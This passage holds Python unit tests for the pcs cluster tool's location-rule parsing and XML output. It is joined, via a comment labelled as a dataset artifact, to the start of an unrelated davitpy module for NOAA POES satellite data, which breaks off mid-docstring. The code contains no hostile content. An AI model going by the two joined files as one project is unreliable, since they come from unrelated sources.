"#uname", "ne", "node1", "and", "#uname", "ne", "node2", "or", "#uname", "eq", "node3" ], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <rule boolean-op="and" id="location-dummy-rule-rule"> <expression attribute="#uname" id="location-dummy-rule-rule-expr" operation="ne" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-rule-expr-1" operation="ne" value="node2"/> </rule> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node3"/> </rule> </rsc_location> """ ) self.assertExpressionXml( [ "#uname", "eq", "node1", "or", "#uname", "eq", "node2", "and", "#uname", "ne", "node3" ], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <rule boolean-op="or" id="location-dummy-rule-rule"> <expression attribute="#uname" id="location-dummy-rule-rule-expr" operation="eq" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-rule-expr-1" operation="eq" value="node2"/> </rule> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node3"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["defined", "pingd", "and", "pingd", "lte", "1"], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <expression attribute="pingd" id="location-dummy-rule-expr" operation="defined"/> <expression attribute="pingd" id="location-dummy-rule-expr-1" operation="lte" value="1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["pingd", "gt", "1", "or", "not_defined", "pingd"], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <expression attribute="pingd" id="location-dummy-rule-expr" operation="gt" value="1"/> <expression attribute="pingd" id="location-dummy-rule-expr-1" operation="not_defined"/> </rule> </rsc_location> """ ) def testAndOrExpressionDateSpec(self): self.assertExpressionXml( ["#uname", "ne", "node1", "and", "date-spec", 
"hours=1-12"], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node1"/> <date_expression id="location-dummy-rule-expr-1" operation="date_spec"> <date_spec hours="1-12" id="location-dummy-rule-expr-1-datespec"/> </date_expression> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date-spec", "monthdays=1-12", "or", "#uname", "ne", "node1"], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <date_expression id="location-dummy-rule-expr" operation="date_spec"> <date_spec id="location-dummy-rule-expr-datespec" monthdays="1-12"/> </date_expression> <expression attribute="#uname" id="location-dummy-rule-expr-1" operation="ne" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date-spec", "monthdays=1-10", "or", "date-spec", "monthdays=11-20"], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <date_expression id="location-dummy-rule-expr" operation="date_spec"> <date_spec id="location-dummy-rule-expr-datespec" monthdays="1-10"/> </date_expression> <date_expression id="location-dummy-rule-expr-1" operation="date_spec"> <date_spec id="location-dummy-rule-expr-1-datespec" monthdays="11-20"/> </date_expression> </rule> </rsc_location> """ ) def testParenthesizedExpression(self): self.assertExpressionXml( [ "(", "#uname", "ne", "node1", "and", "#uname", "ne", "node2", ")", "or", "#uname", "eq", "node3" ], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <rule boolean-op="and" id="location-dummy-rule-rule"> <expression attribute="#uname" id="location-dummy-rule-rule-expr" operation="ne" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-rule-expr-1" operation="ne" value="node2"/> </rule> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node3"/> </rule> 
</rsc_location> """ ) self.assertExpressionXml( [ "#uname", "ne", "node1", "and", "(", "#uname", "ne", "node2", "or", "#uname", "eq", "node3", ")" ], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node1"/> <rule boolean-op="or" id="location-dummy-rule-rule"> <expression attribute="#uname" id="location-dummy-rule-rule-expr" operation="ne" value="node2"/> <expression attribute="#uname" id="location-dummy-rule-rule-expr-1" operation="eq" value="node3"/> </rule> </rule> </rsc_location> """ ) self.assertExpressionXml( [ "(", "#uname", "ne", "node1", "and", "#uname", "ne", "node2", ")", "or", "(", "#uname", "ne", "node3", "and", "#uname", "ne", "node4", ")", ], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <rule boolean-op="and" id="location-dummy-rule-rule"> <expression attribute="#uname" id="location-dummy-rule-rule-expr" operation="ne" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-rule-expr-1" operation="ne" value="node2"/> </rule> <rule boolean-op="and" id="location-dummy-rule-rule-1"> <expression attribute="#uname" id="location-dummy-rule-rule-1-expr" operation="ne" value="node3"/> <expression attribute="#uname" id="location-dummy-rule-rule-1-expr-1" operation="ne" value="node4"/> </rule> </rule> </rsc_location> """ ) self.assertExpressionXml( [ "(", "#uname", "ne", "node1", "and", "#uname", "ne", "node2", ")", "and", "(", "#uname", "ne", "node3", "and", "#uname", "ne", "node4", ")", ], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-expr-1" operation="ne" value="node2"/> <expression attribute="#uname" id="location-dummy-rule-expr-2" operation="ne" value="node3"/> <expression attribute="#uname" 
id="location-dummy-rule-expr-3" operation="ne" value="node4"/> </rule> </rsc_location> """ ) def assertExpressionXml(self, rule_expression, rule_xml): cib_dom = xml.dom.minidom.parse("empty.xml") constraints = cib_dom.getElementsByTagName("constraints")[0] constraint_el = constraints.appendChild( cib_dom.createElement("rsc_location") ) constraint_el.setAttribute("id", "location-dummy") ac( self.builder.build( constraint_el, self.parser.parse(rule_expression) ).parentNode.toprettyxml(indent=" "), rule_xml.lstrip().rstrip(" ") ) class TokenPreprocessorTest(unittest.TestCase): def setUp(self): self.preprocessor = rule.TokenPreprocessor() def testNoChanges(self): self.assertEquals([], self.preprocessor.run([])) self.assertEquals( ["#uname", "eq", "node1"], self.preprocessor.run(["#uname", "eq", "node1"]) ) def testDateSpec(self): self.assertEquals( ["date-spec"], self.preprocessor.run(["date-spec"]) ) self.assertEquals( ["date-spec", "hours=14"], self.preprocessor.run(["date-spec", "hours=14"]) ) self.assertEquals( ["date-spec", "hours weeks=6 months= moon=1"], self.preprocessor.run( ["date-spec", "hours", "weeks=6", "months=", "moon=1"] ) ) self.assertEquals( ["date-spec", "foo", "hours=14"], self.preprocessor.run(["date-spec", "foo", "hours=14"]) ) self.assertEquals( ["date-spec", "hours=14", "foo", "hours=14"], self.preprocessor.run(["date-spec", "hours=14", "foo", "hours=14"]) ) self.assertEquals( [ "date-spec", "hours=1 monthdays=2 weekdays=3 yeardays=4 months=5 " "weeks=6 years=7 weekyears=8 moon=9" ], self.preprocessor.run([ "date-spec", "hours=1", "monthdays=2", "weekdays=3", "yeardays=4", "months=5","weeks=6", "years=7", "weekyears=8", "moon=9" ]) ) self.assertEquals( ["#uname", "eq", "node1", "or", "date-spec", "hours=14"], self.preprocessor.run([ "#uname", "eq", "node1", "or", "date-spec", "hours=14" ]) ) self.assertEquals( ["date-spec", "hours=14", "or", "#uname", "eq", "node1"], self.preprocessor.run([ "date-spec", "hours=14", "or", "#uname", "eq", 
"node1", ]) ) def testDuration(self): self.assertEquals( ["duration"], self.preprocessor.run(["duration"]) ) self.assertEquals( ["duration", "hours=14"], self.preprocessor.run(["duration", "hours=14"]) ) self.assertEquals( ["duration", "hours weeks=6 months= moon=1"], self.preprocessor.run( ["duration", "hours", "weeks=6", "months=", "moon=1"] ) ) self.assertEquals( ["duration", "foo", "hours=14"], self.preprocessor.run(["duration", "foo", "hours=14"]) ) self.assertEquals( ["duration", "hours=14", "foo", "hours=14"], self.preprocessor.run(["duration", "hours=14", "foo", "hours=14"]) ) self.assertEquals( [ "duration", "hours=1 monthdays=2 weekdays=3 yeardays=4 months=5 " "weeks=6 years=7 weekyears=8 moon=9" ], self.preprocessor.run([ "duration", "hours=1", "monthdays=2", "weekdays=3", "yeardays=4", "months=5","weeks=6", "years=7", "weekyears=8", "moon=9" ]) ) self.assertEquals( ["#uname", "eq", "node1", "or", "duration", "hours=14"], self.preprocessor.run([ "#uname", "eq", "node1", "or", "duration", "hours=14" ]) ) self.assertEquals( ["duration", "hours=14", "or", "#uname", "eq", "node1"], self.preprocessor.run([ "duration", "hours=14", "or", "#uname", "eq", "node1", ]) ) def testOperationDatespec(self): self.assertEquals( ["date-spec", "weeks=6 moon=1"], self.preprocessor.run( ["date-spec", "operation=date_spec", "weeks=6", "moon=1"] ) ) self.assertEquals( ["date-spec", "weeks=6 moon=1"], self.preprocessor.run( ["date-spec", "weeks=6", "operation=date_spec", "moon=1"] ) ) self.assertEquals( ["date-spec", "weeks=6", "foo", "moon=1"], self.preprocessor.run( ["date-spec", "weeks=6", "operation=date_spec", "foo", "moon=1"] ) ) self.assertEquals( ["date-spec", "weeks=6", "foo", "operation=date_spec", "moon=1"], self.preprocessor.run( ["date-spec", "weeks=6", "foo", "operation=date_spec", "moon=1"] ) ) self.assertEquals( ["date-spec", "weeks=6 moon=1"], self.preprocessor.run( ["date-spec", "weeks=6", "moon=1", "operation=date_spec"] ) ) self.assertEquals( ["date-spec", 
"weeks=6 moon=1", "foo"], self.preprocessor.run( ["date-spec", "weeks=6", "moon=1", "operation=date_spec", "foo"] ) ) self.assertEquals( ["date-spec"], self.preprocessor.run( ["date-spec", "operation=date_spec"] ) ) self.assertEquals( ["date-spec", "weeks=6", "operation=foo", "moon=1"], self.preprocessor.run( ["date-spec", "weeks=6", "operation=foo", "moon=1"] ) ) def testDateLegacySyntax(self): # valid syntax self.assertEquals( ["date", "gt", "2014-06-26"], self.preprocessor.run([ "date", "start=2014-06-26", "gt" ]) ) self.assertEquals( ["date", "lt", "2014-06-26"], self.preprocessor.run([ "date", "end=2014-06-26", "lt" ]) ) self.assertEquals( ["date", "in_range", "2014-06-26", "to", "2014-07-26"], self.preprocessor.run([ "date", "start=2014-06-26", "end=2014-07-26", "in_range" ]) ) self.assertEquals( ["date", "in_range", "2014-06-26", "to", "2014-07-26"], self.preprocessor.run([ "date", "end=2014-07-26", "start=2014-06-26", "in_range" ]) ) self.assertEquals( ["date", "gt", "2014-06-26", "foo"], self.preprocessor.run([ "date", "start=2014-06-26", "gt", "foo" ]) ) self.assertEquals( ["date", "lt", "2014-06-26", "foo"], self.preprocessor.run([ "date", "end=2014-06-26", "lt", "foo" ]) ) self.assertEquals( ["date", "in_range", "2014-06-26", "to", "2014-07-26", "foo"], self.preprocessor.run([ "date", "start=2014-06-26", "end=2014-07-26", "in_range", "foo" ]) ) self.assertEquals( ["date", "in_range", "2014-06-26", "to", "2014-07-26", "foo"], self.preprocessor.run([ "date", "end=2014-07-26", "start=2014-06-26", "in_range", "foo" ]) ) # invalid syntax - no change self.assertEquals( ["date"], self.preprocessor.run([ "date" ]) ) self.assertEquals( ["date", "start=2014-06-26"], self.preprocessor.run([ "date", "start=2014-06-26" ]) ) self.assertEquals( ["date", "end=2014-06-26"], self.preprocessor.run([ "date", "end=2014-06-26" ]) ) self.assertEquals( ["date", "start=2014-06-26", "end=2014-07-26"], self.preprocessor.run([ "date", "start=2014-06-26", "end=2014-07-26" ]) ) 
self.assertEquals( ["date", "start=2014-06-26", "end=2014-07-26", "lt"], self.preprocessor.run([ "date", "start=2014-06-26", "end=2014-07-26", "lt" ]) ) self.assertEquals( ["date", "start=2014-06-26", "lt", "foo"], self.preprocessor.run([ "date", "start=2014-06-26", "lt", "foo" ]) ) self.assertEquals( ["date", "start=2014-06-26", "end=2014-07-26", "gt", "foo"], self.preprocessor.run([ "date", "start=2014-06-26", "end=2014-07-26", "gt", "foo" ]) ) self.assertEquals( ["date", "end=2014-06-26", "gt"], self.preprocessor.run([ "date", "end=2014-06-26", "gt" ]) ) self.assertEquals( ["date", "start=2014-06-26", "in_range", "foo"], self.preprocessor.run([ "date", "start=2014-06-26", "in_range", "foo" ]) ) self.assertEquals( ["date", "end=2014-07-26", "in_range"], self.preprocessor.run([ "date", "end=2014-07-26", "in_range" ]) ) self.assertEquals( ["foo", "start=2014-06-26", "gt"], self.preprocessor.run([ "foo", "start=2014-06-26", "gt" ]) ) self.assertEquals( ["foo", "end=2014-06-26", "lt"], self.preprocessor.run([ "foo", "end=2014-06-26", "lt" ]) ) def testParenthesis(self): self.assertEquals( ["("], self.preprocessor.run(["("]) ) self.assertEquals( [")"], self.preprocessor.run([")"]) ) self.assertEquals( ["(", "(", ")", ")"], self.preprocessor.run(["(", "(", ")", ")"]) ) self.assertEquals( ["(", "(", ")", ")"], self.preprocessor.run(["(())"]) ) self.assertEquals( ["a", "(", "b", ")", "c"], self.preprocessor.run(["a", "(", "b", ")", "c"]) ) self.assertEquals( ["a", "(", "b", "c", ")", "d"], self.preprocessor.run(["a", "(", "b", "c", ")", "d"]) ) self.assertEquals( ["a", ")", "b", "(", "c"], self.preprocessor.run(["a", ")", "b", "(", "c"]) ) self.assertEquals( ["a", "(", "b", ")", "c"], self.preprocessor.run(["a", "(b)", "c"]) ) self.assertEquals( ["a", "(", "b", ")", "c"], self.preprocessor.run(["a(", "b", ")c"]) ) self.assertEquals( ["a", "(", "b", ")", "c"], self.preprocessor.run(["a(b)c"]) ) self.assertEquals( ["aA", "(", "bB", ")", "cC"], 
self.preprocessor.run(["aA(bB)cC"]) ) self.assertEquals( ["(", "aA", "(", "bB", ")", "cC", ")"], self.preprocessor.run(["(aA(bB)cC)"]) ) self.assertEquals( ["(", "aA", "(", "(", "bB", ")", "cC", ")"], self.preprocessor.run(["(aA(", "(bB)cC)"]) ) self.assertEquals( ["(", "aA", "(", "(", "(", "bB", ")", "cC", ")"], self.preprocessor.run(["(aA(", "(", "(bB)cC)"]) ) class ExportAsExpressionTest(unittest.TestCase): def test_success(self): self.assertXmlExport( """ <rule id="location-dummy-rule" score="INFINITY"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> """, "#uname eq node1", "#uname eq string node1" ) self.assertXmlExport( """ <rule id="location-dummy-rule" score="INFINITY"> <expression attribute="foo" id="location-dummy-rule-expr" operation="gt" type="version" value="1.2.3"/> </rule> """, "foo gt version 1.2.3", "foo gt version 1.2.3" ) self.assertXmlExport( """ <rule boolean-op="or" id="complexRule" score="INFINITY"> <rule boolean-op="and" id="complexRule-rule-1" score="0"> <date_expression id="complexRule-rule-1-expr" operation="date_spec"> <date_spec id="complexRule-rule-1-expr-datespec" weekdays="1-5" hours="12-23"/> </date_expression> <date_expression id="complexRule-rule-1-expr-1" operation="in_range" start="2014-07-26"> <duration id="complexRule-rule-1-expr-1-duration" months="1"/> </date_expression> </rule> <rule boolean-op="and" id="complexRule-rule" score="0"> <expression attribute="foo" id="complexRule-rule-expr-1" operation="gt" type="version" value="1.2"/> <expression attribute="#uname" id="complexRule-rule-expr" operation="eq" value="node3 4"/> </rule> </rule> """, "(date-spec hours=12-23 weekdays=1-5 and date in_range 2014-07-26 to duration months=1) or (foo gt version 1.2 and #uname eq \"node3 4\")", "(#uname eq string \"node3 4\" and foo gt version 1.2) or (date in_range 2014-07-26 to duration months=1 and date-spec hours=12-23 weekdays=1-5)" ) def assertXmlExport(self, rule_xml, export, 
export_normalized): ac( export + "\n", rule.ExportAsExpression().get_string( xml.dom.minidom.parseString(rule_xml).documentElement, normalize=False ) + "\n" ) ac( export_normalized + "\n", rule.ExportAsExpression().get_string( xml.dom.minidom.parseString(rule_xml).documentElement, normalize=True ) + "\n" ) class DomRuleAddTest(unittest.TestCase): def setUp(self): shutil.copy(empty_cib, temp_cib) output, returnVal = pcs(temp_cib, "resource create dummy1 Dummy") assert returnVal == 0 and output == "" def test_success_xml(self): self.assertExpressionXml( ["#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule" score="INFINITY"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["id=myRule", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="myRule" score="INFINITY"> <expression attribute="#uname" id="myRule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["score=INFINITY", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule" score="INFINITY"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["score=100", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule" score="100"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["score-attribute=pingd", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule" score-attribute="pingd"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["role=master", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> 
<rule id="location-dummy-rule" role="master" score="INFINITY"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["role=slave", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule" role="slave" score="INFINITY"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["score=100", "id=myRule", "role=master", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="myRule" role="master" score="100"> <expression attribute="#uname" id="myRule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) def test_success(self): output, returnVal = pcs( temp_cib, "constraint location dummy1 rule #uname eq node1" ) ac(output, "") self.assertEquals(0, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule id=MyRule score=100 role=master #uname eq node2" ) ac(output, "") self.assertEquals(0, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule id=complexRule (#uname eq node3 and foo gt version 1.2) or (date-spec hours=12-23 weekdays=1-5 and date in_range 2014-07-26 to duration months=1)" ) ac(output, "") self.assertEquals(0, returnVal) output, returnVal = pcs(temp_cib, "constraint location show --full") ac(output, """\ Location Constraints: Resource: dummy1 Constraint: location-dummy1 Rule: score=INFINITY (id:location-dummy1-rule) Expression: #uname eq node1 (id:location-dummy1-rule-expr) Constraint: location-dummy1-1 Rule: score=100 role=master (id:MyRule) Expression: #uname eq node2 (id:MyRule-expr) Constraint: location-dummy1-2 Rule: score=INFINITY boolean-op=or (id:complexRule) Rule: score=0 boolean-op=and (id:complexRule-rule) Expression: #uname eq node3 (id:complexRule-rule-expr) Expression: foo gt version 1.2 (id:complexRule-rule-expr-1) Rule: score=0 boolean-op=and 
(id:complexRule-rule-1) Expression: (id:complexRule-rule-1-expr) Date Spec: hours=12-23 weekdays=1-5 (id:complexRule-rule-1-expr-datespec) Expression: date in_range 2014-07-26 to duration (id:complexRule-rule-1-expr-1) Duration: months=1 (id:complexRule-rule-1-expr-1-duration) """) self.assertEquals(0, returnVal) output, returnVal = pcs(temp_cib, "constraint location show") ac(output, """\ Location Constraints: Resource: dummy1 Constraint: location-dummy1 Rule: score=INFINITY Expression: #uname eq node1 Constraint: location-dummy1-1 Rule: score=100 role=master Expression: #uname eq node2 Constraint: location-dummy1-2 Rule: score=INFINITY boolean-op=or Rule: score=0 boolean-op=and Expression: #uname eq node3 Expression: foo gt version 1.2 Rule: score=0 boolean-op=and Expression: Date Spec: hours=12-23 weekdays=1-5 Expression: date in_range 2014-07-26 to duration Duration: months=1 """) self.assertEquals(0, returnVal) def test_invalid_score(self): output, returnVal = pcs( temp_cib, "constraint location dummy1 rule score=pingd defined pingd" ) ac( output, "Warning: invalid score 'pingd', setting score-attribute=pingd " "instead\n" ) self.assertEquals(0, returnVal) output, returnVal = pcs(temp_cib, "constraint location show --full") ac(output, """\ Location Constraints: Resource: dummy1 Constraint: location-dummy1 Rule: score-attribute=pingd (id:location-dummy1-rule) Expression: defined pingd (id:location-dummy1-rule-expr) """) self.assertEquals(0, returnVal) def test_invalid_rule(self): output, returnVal = pcs( temp_cib, "constraint location dummy1 rule score=100" ) ac(output, "Error: no rule expression was specified\n") self.assertEquals(1, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule #uname eq" ) ac( output, "Error: '#uname eq' is not a valid rule expression: unexpected end " "of rule\n" ) self.assertEquals(1, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule string #uname eq node1" ) ac( output, "Error: 
'string #uname eq node1' is not a valid rule expression: " "unexpected 'string' before 'eq'\n" ) self.assertEquals(1, returnVal) def test_ivalid_options(self): output, returnVal = pcs( temp_cib, "constraint location dummy1 rule role=foo #uname eq node1" ) ac(output, "Error: invalid role 'foo', use 'master' or 'slave'\n") self.assertEquals(1, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule score=100 score-attribute=pingd #uname eq node1" ) ac(output, "Error: can not specify both score and score-attribute\n") self.assertEquals(1, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule id=1foo #uname eq node1" ) ac( output, "Error: invalid rule id '1foo', '1' is not a valid first character " "for a rule id\n" ) self.assertEquals(1, returnVal) output, returnVal = pcs(temp_cib, "constraint location show --full") ac(output, "Location Constraints:\n") self.assertEquals(0, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule id=MyRule #uname eq node1" ) ac(output, "") self.assertEquals(0, returnVal) output, returnVal = pcs(temp_cib, "constraint location show --full") ac(output, """\ Location Constraints: Resource: dummy1 Constraint: location-dummy1 Rule: score=INFINITY (id:MyRule) Expression: #uname eq node1 (id:MyRule-expr) """) self.assertEquals(0, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule id=MyRule #uname eq node1" ) ac( output, "Error: id 'MyRule' is already in use, please specify another one\n" ) self.assertEquals(1, returnVal) def assertExpressionXml(self, rule_expression, rule_xml): cib_dom = xml.dom.minidom.parse("empty.xml") constraints = cib_dom.getElementsByTagName("constraints")[0] constraint_el = constraints.appendChild( cib_dom.createElement("rsc_location") ) constraint_el.setAttribute("id", "location-dummy") options, rule_argv = rule.parse_argv(rule_expression) rule.dom_rule_add(constraint_el, options, rule_argv) ac( 
            constraint_el.toprettyxml(indent=" "),
            rule_xml.lstrip().rstrip(" ")
        )

# Allow the suite to be run directly (e.g. "python test_rule.py") as well as
# through a test runner that imports this module.
if __name__ == "__main__":
    unittest.main()
# --- dataset artifact: following content is from repo Shirling-VT/davitpy_sam ---
# --- file path: davitpy/gme/sat/poes.py ---
""" .. module:: poes :synopsis: A module for reading, writing, and storing poes Data .. moduleauthor:: AJ, 20130129 ********************* **Module**: gme.sat.poes ********************* **Classes**: * :class:`poesRec` **Functions**: * :func:`readPoes` * :func:`readPoesFtp` * :func:`mapPoesMongo` * :func:`overlayPoesTed` """ from davitpy.gme.base.gmeBase import gmeData class poesRec(gmeData): """a class to represent a record of poes data. Extends :class:`gmeBase.gmeData`. Insight on the class members can be obtained from `the NOAA NGDC site <ftp://satdat.ngdc.noaa.gov/sem/poes/data/readme.txt>`_. Note that Poes data is available from 1998-present day (or whatever the latest NOAA has uploaded is). **The data are the 16-second averages** **Members**: * **time** (`datetime <http://tinyurl.com/bl352yx>`_): an object identifying which time these data are for * **info** (str): information about where the data come from. *Please be courteous and give credit to data providers when credit is due.* * **dataSet** (str): the name of the data set * **satnum** (ind): the noaa satellite number * **sslat** (float): Geographic Latitude of sub-satellite point, degrees * **sslon** (float): Geographic Longitude of sub-satellite point, degrees * **folat** (float): Geographic Latitude of foot-of-field-line, degrees * **folon** (float): Geographic Longitude of foot-of-field-line, degrees * **lval** (float): L-value * **mlt** (float): Magnetic local time of foot-of-field-line, degrees * **pas0** (float): MEPED-0 pitch angle at satellite, degrees * **pas90** (float): MEPED-90 pitch angle at satellite, degrees * **mep0e1** (float): MEPED-0 > 30 keV electrons, counts/sec * **mep0e2** (float): MEPED-0 > 100 keV electrons, counts/sec * **mep0e3** (float): MEPED-0 > 300 keV electrons, counts/sec * **mep0p1** (float):MEPED-0 30 keV to 80 keV protons, counts/sec * **mep0p2** (float): MEPED-0 80 keV to 240 keV protons, counts/sec * **mep0p3** (float): 240 kev to 800 keV protons, counts/sec * 
**mep0p4** (float): MEPED-0 800 keV to 2500 keV protons, counts/sec * **mep0p5** (float): MEPED-0 2500 keV to 6900 keV protons, counts/sec * **mep0p6** (float): MEPED-0 > 6900 keV protons, counts/sec, * **mep90e1** (float): MEPED-90 > 30 keV electrons, counts/sec, * **mep90e2** (float): MEPED-90 > 100 keV electrons, counts/sec * **mep90e3** (float): MEPED-90 > 300 keV electrons, counts/sec * **mep90p1** (float): MEPED-90 30 keV to 80 keV protons, counts/sec * **mep90p2** (float): MEPED-90 80 keV to 240 keV protons, counts/sec * **mep90p3** (float): MEPED-90 240 kev to 800 keV protons, counts/sec, * **mep90p4** (float): MEPED-90 800 keV to 2500 keV protons, counts/sec * **mep90p5** (float): MEPED-90 2500 keV to 6900 keV protons, counts/sec * **mep90p6** (float):MEPED-90 > 6900 keV protons, counts/sec * **mepomp6** (float): MEPED omni-directional > 16 MeV protons, counts/sec * **mepomp7** (float): MEPED omni-directional > 36 Mev protons, counts/sec * **mepomp8** (float): MEPED omni-directional > 70 MeV protons, counts/sec * **mepomp9** (float): MEPED omni-directional >= 140 MeV protons * **ted** (float): TED, Total Energy Detector Average, ergs/cm2/sec * **echar** (float): TED characteristic energy of electrons, eV * **pchar** (float): TED characteristic energy of protons, eV * **econtr** (float): TED electron contribution, Electron Energy/Total Energy .. note:: If any of the members have a value of None, this means that they could not be read for that specific time **Methods**: * :func:`parseFtp` **Example**: :: emptyPoesObj = gme.sat.poesRec() written by AJ, 20130131 """ def parseFtp(self,line, header): """This method is used to convert a line of poes data read from the NOAA NGDC FTP site into a :class:`poesRec` object. .. note:: In general, users will not need to worry about this. **Belongs to**: :class:`poesRec` **Args**: * **line** (str): the ASCII line from the FTP server **Returns**: * Nothing. 
**Example**: :: myPoesObj.parseFtp(ftpLine) written by AJ, 20130131 """ import datetime as dt #split the line into cols cols = line.split() head = header.split() self.time = dt.datetime(int(cols[0]), int(cols[1]), int(cols[2]), int(cols[3]),int(cols[4]), \ int(float(cols[5])),int(round((float(cols[5])-int(float(cols[5])))*1e6))) for key in self.__dict__.iterkeys(): if(key == 'dataSet' or key == 'info' or key == 'satnum' or key == 'time'): continue try: ind = head.index(key) except Exception,e: print e print 'problem setting attribute',key #check for a good value if(float(cols[ind]) != -999.): setattr(self,key,float(cols[ind])) def __init__(self, ftpLine=None, dbDict=None, satnum=None, header=None): """the intialization fucntion for a :class:`omniRec` object. .. note:: In general, users will not need to worry about this. **Belongs to**: :class:`omniRec` **Args**: * [**ftpLine**] (str): an ASCII line from the FTP server. if this is provided, the object is initialized from it. header must be provided in conjunction with this. default=None * [**header**] (str): the header from the ASCII FTP file. default=None * [**dbDict**] (dict): a dictionary read from the mongodb. if this is provided, the object is initialized from it. default = None * [**satnum**] (int): the satellite nuber. default=None **Returns**: * Nothing. **Example**: :: myPoesObj = poesRec(ftpLine=aftpLine) written by AJ, 20130131 """ #note about where data came from self.dataSet = 'Poes' self.info = 'These data were downloaded from NASA SPDF. 
*Please be courteous and give credit to data providers when credit is due.*' self.satnum = satnum self.sslat = None self.sslon = None self.folat = None self.folon = None self.lval = None self.mlt = None self.pas0 = None self.pas90 = None self.mep0e1 = None self.mep0e2 = None self.mep0e3 = None self.mep0p1 = None self.mep0p2 = None self.mep0p3 = None self.mep0p4 = None self.mep0p5 = None self.mep0p6 = None self.mep90e1 = None self.mep90e2 = None self.mep90e3 = None self.mep90p1 = None self.mep90p2 = None self.mep90p3 = None self.mep90p4 = None self.mep90p5 = None self.mep90p6 = None self.mepomp6 = None self.mepomp7 = None self.mepomp8 = None self.mepomp9 = None self.ted = None self.echar = None self.pchar = None self.econtr = None #if we're initializing from an object, do it! if(ftpLine != None): self.parseFtp(ftpLine,header) if(dbDict != None): self.parseDb(dbDict) def readPoes(sTime,eTime=None,satnum=None,folat=None,folon=None,ted=None,echar=None,pchar=None): """This function reads poes data. First, it will try to get it from the mongodb, and if it can't find it, it will look on the NOAA NGDC FTP server using :func:`readPoesFtp`. The data are 16-second averages **Args**: * **sTime** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the earliest time you want data for * [**eTime**] (`datetime <http://tinyurl.com/bl352yx>`_ or None): the latest time you want data for. if this is None, end Time will be 1 day after sTime. default = None * [**satnum**] (int): the satellite you want data for. eg 17 for noaa17. if this is None, data for all satellites will be returned. default = None * [**satnum**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with bx values in the range [a,b] will be returned. default = None * [**folat**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with bx values in the range [a,b] will be returned. 
